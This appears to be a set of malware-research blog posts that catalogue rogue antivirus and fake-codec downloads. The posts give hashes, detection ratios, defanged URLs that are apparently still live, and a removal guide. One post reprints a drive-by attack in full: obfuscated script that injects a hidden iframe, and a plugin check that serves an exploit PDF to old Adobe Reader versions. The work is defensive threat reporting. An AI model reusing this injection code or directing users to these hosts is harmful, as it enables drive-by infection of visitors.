Only one file to add to the database today. Maybe later on there will be more. As usual, the URL is still live so proceed at your own risk. This is available in /pnuemo-malware/.
MediaTubeCodec_ver1.955.0.exe
Result: 3/35 (8.58%)
MD5: 1968047e55acf222d7d0a4eaee1a3c40
VirusTotal
ThreatExpert Analysis
hxxp://software-for-me08.com/download/502/955/0/
This morning we’ve found a website that automatically loads an infected pdf file.
When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…
Links still live, proceed at your own risk.
User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included
<script language=”javascript”>document.write(unescape(‘%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>
when deobfuscated…
<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
We can see the hidden iframe above and the page includes the following code…
<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(‘<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>
Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.
gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal
Update your software!
UPDATED 9/1 12p PST
us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf
This is a special post that will provide some knowledge on how to remove some of the rogue anti-malware software that has become an epidemic (Antivirus 2008, XP Antivirus, MS Antivirus, etc.). AV companies try their best to keep up to date of all the latest incarnations of this rogue software, but in some cases it can be weeks for your AV to detect these. This will show you how you can remove some of these with free utilities. These instructions may not be that easy for the novice user, but we tried to make it as simple as possible. I will say that this process may not work in EVERY case, however most of the ones we’ve come across can be removed this way. Please be careful when attempting to remove this malware. You do not want to delete the wrong file. Try this at your own risk.
The tools used in this video are Process Explorer and Autoruns both available for free from SysInternals.
Process Explorer
Autoruns
(Click image for video)
(Click here to download video (.wmv))
Today we found a new site distributing the rogue anti-malware software, Wista Antivirus 2009. The file downloaded at the website (setup_en.exe (575953F4912EA2B9FF2598D0EE561828) currently shows zero detection over at VirusTotal. If we click on the “Free Scan” we are redirected to fake scan page and the removal file provided points to “Spyware Isolator”, which is detected by most AV’s.
Site: hxxp://wista-antivirus2009.com
File: setup_en.exe 3126445 bytes | spywareisolator_installer.exe 81920 bytes
MDB Path: /lithium-malware/setup_en.zip | /lithium-malware/
The IRVL group seems to think that they will go undetected longer by creating a bunch of new domains over the weekend. Pft! They should know by now that we don’t sleep over here. 
The files currently being distributed have been passed around quite a bit and I expect for the binaries to be changed within the next few days. One of the new domains (hxxp://antivirused.com) already has an updated file (DEFB61DF4D6A187038FC3725EB431FAB) with only a 5/36 detection ratio at VirusTotal.
None of these new domains have the exploit code we talked about here. (at the time of this post)
Site: hxxp://antivirus5.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirus6.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirused.com
File: scan.exe (DEFB61DF4D6A187038FC3725EB431FAB)
Info: File size: 203776 bytes [VirusTotal 5/36] [ThreatExpert] *new*
MDB Path: /lithium-malware/scan(4).zip
Site: hxxp://antivirusik.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirusol.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirusrf.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirustg.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirusuj.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirusyh.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Site: hxxp://antivirusik.com
File: scan.exe (ACA8B3BF12AF0B652AF5997DB629BDC5)
Info: File size: 203776 bytes [VirusTotal18/36]
MDB Path: /lithium-malware/scan.zip
Here is a fresh round of malware found over the last couple of days. All information about them is listed. They are available /pnuemo-malware/.
Websites are still live, proceed at your own risk!
us.txt (Rename to .exe to install)
Result: 7/36 (19.45%)
MD5: 2ba4acadfb372ea3a29874afe46cf6d4
VirusTotal
ThreatExpert Analysis
hxxp://lolika.cn/docs/us.txt
us4.txt (Rename to .exe to install)
Result: 5/36 (13.89%)
MD5: 6a732d670ff5b0fc0f5d220f0e8fb332
VirusTotal
ThreatExpert Analysis
hxxp://lolika.cn/docs/us.txt
CalcRFC.exe | CalcImpSAT.exe | CalsRT58.exe
Result: 1/36 (2.78%)
MD5: daef83cdf59d4bf97d2e220c0689cd1b
VirusTotal
ThreatExpert Analysis
hxxp://art.creativity.edu.tw/images/avatar/users/
hxxp://schooldog.com/bbs/skin/sara_bbs/
videporn920ma.exe
Result: 23/36 (63.89%)
MD5: 1e5e45f5fa77546b0628a41fc37176fd
VirusTotal
ThreatExpert Analysis
hxxp://camp.ro/videporn920ma.exe
CleanerInstaller.exe
Result: 16/36 (44.45%)
MD5: d3dfcc09e20af294bce88d5b50996ead
VirusTotal
ThreatExpert Analysis
hxxp://download.secureexpertcleaner.com/CleanerInstaller.exe
TotalSecure2009.exe
Result: 4/35 (11.43%)
MD5: 02a18d7e8dc15a53b8830bdcd68e7fe4
VirusTotal
ThreatExpert Analysis
hxxp://gettotalsec2008.com/TotalSecure2009.exe
setup_110084_3_.exe
Result: 4/35 (11.43%)
MD5: 0b429e47169219edd3a21d7845355ec0
VirusTotal
ThreatExpert Analysis
hxxp://dnld.winsecuritydl.com/load/setup_110084_3_.exe
setup_1_506_.exe
Result: 14/36 (38.89%)
MD5: 852eaacfb096afe7b72fe04cebe3612d
VirusTotal
ThreatExpert Analysis
hxxp://dnld.getwsp.com/load/setup_1_506_.exe
wotcodec.v.1.000.exe
Result: 18/36 (50%)
MD5: 905c85ab50f200dd0229cc93e055ed5a
VirusTotal
ThreatExpert Analysis
hxxp://wotcodec.com/download/wotcodec.v.1.000.exe
It’s no surprise that there is a slew of pornographic websites that spread malware. This one is a rip-off of an adult website that takes after a very popular website YouTube. This fake page has comments just as the real one would or like YouTube would. They are keeping up with the times by spreading new variants with low detection. This one in particular is undetected by all AV’s except for one heuristic catch. This file is available in /pnuemo-malware/ in our repository.
codec.v.1.0.exe Result: 1/36 (2.78%)
MD5: 611430330319db5ce1ff98b6293576f7
VirusTotal
ThreatExpert Analysis
Note: This site is advertising Rogue “Fake” Anti-malware software. Do not purchase, download, or install the software!
Sites:
Files:
